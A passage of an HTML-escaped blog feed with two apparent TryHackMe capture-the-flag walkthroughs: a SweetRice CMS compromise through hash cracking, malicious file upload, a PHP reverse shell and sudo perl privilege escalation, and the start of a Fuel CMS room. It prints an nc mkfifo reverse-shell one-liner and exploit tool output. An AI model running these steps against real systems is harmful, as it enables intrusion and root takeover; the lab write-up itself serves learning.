OpenSSH &amp;lt; 7.4 - agent Protocol Arbitrary Library Loading                                                                                 | linux/remote/40963.txt
OpenSSH &amp;lt; 7.7 - User Enumeration &lt;span class="o"&gt;(&lt;/span&gt;2&lt;span class="o"&gt;)&lt;/span&gt;                                                                                                     | linux/remote/45939.py
OpenSSHd 7.2p2 - Username Enumeration                                                                                                    | linux/remote/40113.txt
&lt;span class="nt"&gt;-----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
Shellcodes: No Results
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's get back to this later&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Port 80 - Webserver - Apache 2.4.1&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Result of feroxbuster scan&lt;br&gt;
&lt;code&gt;feroxbuster -u http://10.10.42.242 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php --extract-links&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;301        9l       28w      314c http://10.10.42.242/content                                                                                                              
301        9l       28w      321c http://10.10.42.242/content/images                                                                                                       
200       36l      151w     2198c http://10.10.42.242/content/index.php                                                                                                    
200       15l       74w     3338c http://10.10.42.242/icons/ubuntu-logo.png                                                                                                
301        9l       28w      318c http://10.10.42.242/icons/small                                                                                                          
200      375l      968w    11321c http://10.10.42.242/index.html                                                                                                           
200      166l      644w     5108c http://10.10.42.242/icons/README                                                                                                       
301        9l       28w      317c http://10.10.42.242/content/js                                                                                                          
200        3l        8w      176c http://10.10.42.242/icons/small/folder.png

Ignoring contents of /icons/small/&lt;span class="k"&gt;*&lt;/span&gt; since those are part of standard Apache installation

301        9l       28w      318c http://10.10.42.242/content/inc
200        0l        0w        0c http://10.10.42.242/content/inc/db.php
301        9l       28w      317c http://10.10.42.242/content/as
301        9l       28w      324c http://10.10.42.242/content/inc/cache
301        9l       28w      323c http://10.10.42.242/content/inc/lang
200        7l       28w     1553c http://10.10.42.242/content/images/captcha.php
200        0l        0w        0c http://10.10.42.242/content/inc/alert.php
200        0l        0w        0c http://10.10.42.242/content/inc/function.php
301        9l       28w      325c http://10.10.42.242/content/attachment
200        0l        0w        0c http://10.10.42.242/content/inc/404.php
200        0l        0w        0c http://10.10.42.242/content/inc/rssfeed.php
301        9l       28w      321c http://10.10.42.242/content/as/lib
200        0l        0w        0c http://10.10.42.242/content/as/lib/category.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/main.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/media.php
301        9l       28w      320c http://10.10.42.242/content/as/js
200        0l        0w        0c http://10.10.42.242/content/as/lib/post.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/comment.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/information.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/ad.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/license.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/install.php
200        0l        0w        0c http://10.10.42.242/content/as/lib/update.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Webserver is a mess. Dir listing enabled. PHP files available for everyone to see(not useful as we can only see interpreted results). Also means MySQL/DB installation on remote machine.&lt;/p&gt;

&lt;p&gt;Webpage at &lt;a href="http://10.10.42.242/content/"&gt;http://10.10.42.242/content/&lt;/a&gt; says &lt;em&gt;Welcome to SweetRice - Thank your for install SweetRice as your website management system.&lt;/em&gt; Looks like some sort of CMS&lt;/p&gt;

&lt;p&gt;Link to docs for after-install config on home page =&amp;gt; &lt;a href="https://www.sweetrice.xyz/docs/5-things-need-to-be-done-when-SweetRice-installed/"&gt;https://www.sweetrice.xyz/docs/5-things-need-to-be-done-when-SweetRice-installed/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;At &lt;a href="http://10.10.42.242/content/inc/"&gt;http://10.10.42.242/content/inc/&lt;/a&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--8ELURBCj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l7genlsonfwyyzqb5u1m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--8ELURBCj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l7genlsonfwyyzqb5u1m.png" alt="Alt Text" width="433" height="763"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;At &lt;a href="http://10.10.42.242/content/as/"&gt;http://10.10.42.242/content/as/&lt;/a&gt; , some kind of admin portal&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--akFgSrlB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/57jm2d08j67l1a3ralrm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--akFgSrlB--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/57jm2d08j67l1a3ralrm.png" alt="Alt Text" width="525" height="489"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Ok, let's look for some exploits&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;searchsploit sweetrice    
&lt;span class="nt"&gt;-----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
 Exploit Title                                                                                                                           |  Path
&lt;span class="nt"&gt;-----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
SweetRice 0.5.3 - Remote File Inclusion                                                                                                  | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities                                                                                               | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download                                                                                                | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload                                                                                                  | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure                                                                                                      | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery                                                                                             | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution                                                                        | php/webapps/40700.html
SweetRice &amp;lt; 0.6.4 - &lt;span class="s1"&gt;'FCKeditor'&lt;/span&gt; Arbitrary File Upload                                                                                    | php/webapps/14184.txt
&lt;span class="nt"&gt;-----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
Shellcodes: No Results
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Trying to get the version of the CMS, but unable to. Would be great if we could use an arbitrary file upload exploit to get a reverse shell.&lt;/p&gt;

&lt;p&gt;In the previous screenshot, we saw a "mysql_backup" folder, which seems to have a backup file. Let's download it and see if we can get some user creds.&lt;/p&gt;

&lt;p&gt;Seems like a PHP script that contains a DB SQL schema for the CMS system. There is one statement that contains values to be inserted. In that we find&lt;/p&gt;

&lt;p&gt;&lt;code&gt;"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\"&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;So the admin username is manager? And their password hash is that 32-character string? Probably. Let's use &lt;a href="https://crackstation.net/"&gt;Crackstation&lt;/a&gt; to crack that hash&lt;/p&gt;

&lt;p&gt;Success. its an MD5 hash for &lt;em&gt;CENSORED&lt;/em&gt;. Lets try &lt;code&gt;manager:*CENSORED*&lt;/code&gt; on the admin portal we found earlier.&lt;/p&gt;

&lt;p&gt;SUCCESS!! We have logged in as admin.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--dRucr_Bx--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qfb98elqeak699zaelxz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--dRucr_Bx--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qfb98elqeak699zaelxz.png" alt="Alt Text" width="800" height="152"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We also have the version as 1.5.1. Let's try to use the &lt;a href="https://www.exploit-db.com/exploits/40716"&gt;Aribtrary File Upload exploit&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Lets try to upload a PHP reverse shell from &lt;code&gt;/usr/share/webshells/php&lt;/code&gt; after configuring IP and port.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;+-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-+
|  _________                      __ __________.__                  |
| /   _____/_  _  __ ____   _____/  |&lt;span class="se"&gt;\_&lt;/span&gt;_____   &lt;span class="se"&gt;\_&lt;/span&gt;_| ____  ____      |
| &lt;span class="se"&gt;\_&lt;/span&gt;____  &lt;span class="se"&gt;\ \/&lt;/span&gt; &lt;span class="se"&gt;\/&lt;/span&gt; // __ &lt;span class="se"&gt;\_&lt;/span&gt;/ __ &lt;span class="se"&gt;\ &lt;/span&gt;  __&lt;span class="se"&gt;\ &lt;/span&gt;      _/  |/ ___&lt;span class="se"&gt;\/&lt;/span&gt; __ &lt;span class="se"&gt;\ &lt;/span&gt;    |
| /        &lt;span class="se"&gt;\ &lt;/span&gt;    /&lt;span class="se"&gt;\ &lt;/span&gt; ___/&lt;span class="se"&gt;\ &lt;/span&gt; ___/|  | |    |   &lt;span class="se"&gt;\ &lt;/span&gt; &lt;span class="se"&gt;\ &lt;/span&gt; &lt;span class="se"&gt;\_&lt;/span&gt;_&lt;span class="se"&gt;\ &lt;/span&gt; ___/     |
|/_______  / &lt;span class="se"&gt;\/\_&lt;/span&gt;/  &lt;span class="se"&gt;\_&lt;/span&gt;__  &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="se"&gt;\_&lt;/span&gt;__  &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;__| |____|_  /__|&lt;span class="se"&gt;\_&lt;/span&gt;__  &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;___  &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;    |
|        &lt;span class="se"&gt;\/&lt;/span&gt;             &lt;span class="se"&gt;\/&lt;/span&gt;     &lt;span class="se"&gt;\/&lt;/span&gt;            &lt;span class="se"&gt;\/&lt;/span&gt;        &lt;span class="se"&gt;\/&lt;/span&gt;    &lt;span class="se"&gt;\/&lt;/span&gt;     |                                                    
|    &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; SweetRice 1.5.1 Unrestricted File Upload                     |
|    &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; Script Cod3r : Ehsan Hosseini                                |
+-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-&lt;span class="o"&gt;==&lt;/span&gt;-+

Enter The Target URL&lt;span class="o"&gt;(&lt;/span&gt;Example : localhost.com&lt;span class="o"&gt;)&lt;/span&gt; : 10.10.42.242/content
Enter Username : manager
Enter Password : CENSORED
Enter FileName &lt;span class="o"&gt;(&lt;/span&gt;Example:.htaccess,shell.php5,index.html&lt;span class="o"&gt;)&lt;/span&gt; : revshell.php
&lt;span class="o"&gt;[&lt;/span&gt;+] Sending User&amp;amp;Pass...
&lt;span class="o"&gt;[&lt;/span&gt;+] Login Succssfully...
&lt;span class="o"&gt;[&lt;/span&gt;+] File Uploaded...
&lt;span class="o"&gt;[&lt;/span&gt;+] URL : http://10.10.42.242/content/attachment/revshell.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Trying to execute reverse shell. Login successful but not working. Getting a 404 error. There is an attachment folder but nothing inside it.&lt;/p&gt;

&lt;p&gt;Now trying &lt;a href="https://www.exploit-db.com/exploits/40700"&gt;PHP CSRF/RCE Exploit&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So we will upload a HTML ad containing some PHP code for reverse shell to &lt;a href="http://10.10.42.242/content/as/?type=ad"&gt;http://10.10.42.242/content/as/?type=ad&lt;/a&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ibrEDhqK--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aueria9bjegszz42j3dh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ibrEDhqK--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aueria9bjegszz42j3dh.png" alt="Alt Text" width="620" height="241"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;SUCCESS! We got shell! Also found user.txt in &lt;code&gt;/home/itguy/&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
total 56
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Desktop
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Documents
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Downloads
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Music
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Pictures
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Public
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Templates
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Videos
&lt;span class="nt"&gt;-rw-r--r-x&lt;/span&gt; 1 root  root    47 Nov 29  2019 backup.pl
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 itguy itguy 8980 Nov 29  2019 examples.desktop
&lt;span class="nt"&gt;-rw-rw-r--&lt;/span&gt; 1 itguy itguy   16 Nov 29  2019 mysql_login.txt
&lt;span class="nt"&gt;-rw-rw-r--&lt;/span&gt; 1 itguy itguy   38 Nov 29  2019 user.txt

www-data@THM-Chal:/home/itguy&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;mysql_login.txt
&lt;span class="k"&gt;*&lt;/span&gt;CENSORED&lt;span class="k"&gt;*&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;MySQL creds. Something to keep in mind for later on.&lt;/p&gt;

&lt;p&gt;MySQL Login success. Version info &lt;br&gt;
&lt;code&gt;Server version: 5.7.28-0ubuntu0.16.04.2&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;3) Privilege Escalation&lt;/p&gt;

&lt;p&gt;Let's try running a PrivEsc script to find some vectors&lt;/p&gt;

&lt;p&gt;Link to lse.sh =&amp;gt; &lt;a href="https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh"&gt;https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Uploaded and running &lt;code&gt;lse.sh -i -l 1&lt;/code&gt; for privesc vectors&lt;/p&gt;

&lt;p&gt;Interesting stuff from &lt;code&gt;lse.sh&lt;/code&gt; results&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; usr020 Are there other &lt;span class="nb"&gt;users &lt;/span&gt;&lt;span class="k"&gt;in &lt;/span&gt;administrative &lt;span class="nb"&gt;groups&lt;/span&gt;?................. &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
adm:x:4:syslog,itguy
&lt;span class="nb"&gt;sudo&lt;/span&gt;:x:27:itguy

&lt;span class="o"&gt;[!]&lt;/span&gt; sud010 Can we list &lt;span class="nb"&gt;sudo &lt;/span&gt;commands without a password?................... &lt;span class="nb"&gt;yes&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;
&lt;span class="nt"&gt;---&lt;/span&gt;
Matching Defaults entries &lt;span class="k"&gt;for &lt;/span&gt;www-data on THM-Chal:
    env_reset, mail_badpass, &lt;span class="nv"&gt;secure_path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/usr/local/sbin&lt;span class="se"&gt;\:&lt;/span&gt;/usr/local/bin&lt;span class="se"&gt;\:&lt;/span&gt;/usr/sbin&lt;span class="se"&gt;\:&lt;/span&gt;/usr/bin&lt;span class="se"&gt;\:&lt;/span&gt;/sbin&lt;span class="se"&gt;\:&lt;/span&gt;/bin&lt;span class="se"&gt;\:&lt;/span&gt;/snap/bin

User www-data may run the following commands on THM-Chal:
    &lt;span class="o"&gt;(&lt;/span&gt;ALL&lt;span class="o"&gt;)&lt;/span&gt; NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This looks interesting. So let's explore this a bit. &lt;/p&gt;

&lt;p&gt;Looks like we can run &lt;code&gt;sudo /usr/bin/perl /home/itguy/backup.pl&lt;/code&gt; as anyone&lt;/p&gt;

&lt;p&gt;Contents of backup.pl, which is readable by &lt;code&gt;www-data&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;www-data@THM-Chal:/home/itguy&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;backup.pl 
&lt;span class="c"&gt;#!/usr/bin/perl&lt;/span&gt;

system&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"sh"&lt;/span&gt;, &lt;span class="s2"&gt;"/etc/copy.sh"&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Wish we could edit this, but we can't. What about &lt;code&gt;/etc/copy.sh&lt;/code&gt; ?&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;www-data@THM-Chal:/home/itguy&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt; /etc/copy.sh&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;cat&lt;/span&gt; /etc/copy.sh 
&lt;span class="nt"&gt;-rw-r--rwx&lt;/span&gt; 1 root root 81 Nov 29  2019 /etc/copy.sh
&lt;span class="nb"&gt;rm&lt;/span&gt; /tmp/f&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;mkfifo&lt;/span&gt; /tmp/f&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /tmp/f|/bin/sh &lt;span class="nt"&gt;-i&lt;/span&gt; 2&amp;gt;&amp;amp;1|nc 192.168.0.190 5554 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;/tmp/f
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Looks like &lt;code&gt;/etc/copy.sh&lt;/code&gt; is world-writable. sysadmin originally set it up to send a reverse shell to another machine. But we will reconfigure it to execute bash and get a root shell.&lt;/p&gt;

&lt;p&gt;After modification&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;www-data@THM-Chal:/home/itguy&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /etc/copy.sh
/bin/bash &lt;span class="nt"&gt;-i&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Time for action!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;www-data@THM-Chal:/home/itguy&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; root /usr/bin/perl /home/itguy/backup.pl
root@THM-Chal:/home/itguy# &lt;span class="nb"&gt;id
&lt;/span&gt;&lt;span class="nv"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;gid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;groups&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Woohoo! And that's that!&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>security</category>
      <category>infosec</category>
      <category>ctf</category>
    </item>
    <item>
      <title>TryHackMe Ignite Room Walkthrough</title>
      <dc:creator>Krishna</dc:creator>
      <pubDate>Fri, 30 Jul 2021 17:25:56 +0000</pubDate>
      <link>https://dev.to/wandering-geek/tryhackme-ignite-room-walkthrough-5672</link>
      <guid>https://dev.to/wandering-geek/tryhackme-ignite-room-walkthrough-5672</guid>
      <description>&lt;p&gt;&lt;a href="https://tryhackme.com/room/ignite"&gt;https://tryhackme.com/room/ignite&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;A new start-up has a few issues with their web server.&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  1.  Enumeration
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-Pn&lt;/span&gt; &lt;span class="nv"&gt;$IP&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; nmap/results &lt;span class="nt"&gt;-vv&lt;/span&gt;
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 60 Apache httpd 2.4.18 &lt;span class="o"&gt;((&lt;/span&gt;Ubuntu&lt;span class="o"&gt;))&lt;/span&gt;
| http-methods:        
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/fuel/               
|_http-server-header: Apache/2.4.18 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;
|_http-title: Welcome to FUEL CMS    
No exact OS matches &lt;span class="k"&gt;for &lt;/span&gt;host &lt;span class="o"&gt;(&lt;/span&gt;If you know what OS is running on it, see https://nmap.org/submit/ &lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Only one port open, that is port 80.&lt;/p&gt;

&lt;p&gt;Upon opening it a browser, it seems to be running Fuel CMS 1.4&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ukK9ZlIc--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y568p1x4pg1y514gy833.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ukK9ZlIc--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y568p1x4pg1y514gy833.png" alt="Alt Text" width="800" height="625"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Seems to be a default installation. Upon scrolling down we see&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--fG5jYX4Y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/skmjhgtlekqcg10a4rz8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--fG5jYX4Y--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/skmjhgtlekqcg10a4rz8.png" alt="Alt Text" width="800" height="351"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the admin portal&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--iOdghWzF--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t5tmoyu8exvin4qmrdqw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--iOdghWzF--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t5tmoyu8exvin4qmrdqw.png" alt="Alt Text" width="461" height="303"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We try the combo of &lt;code&gt;admin:admin&lt;/code&gt; and it works. We are in the admin portal.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--CQLa4MIL--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ndhjxap6qrzn29xibjk2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--CQLa4MIL--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ndhjxap6qrzn29xibjk2.png" alt="Alt Text" width="800" height="81"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h3&gt;
  
  
  2. Foothold
&lt;/h3&gt;

&lt;p&gt;Let's search for any exploits that may be available for Fuel CMS on Exploit DB&lt;br&gt;
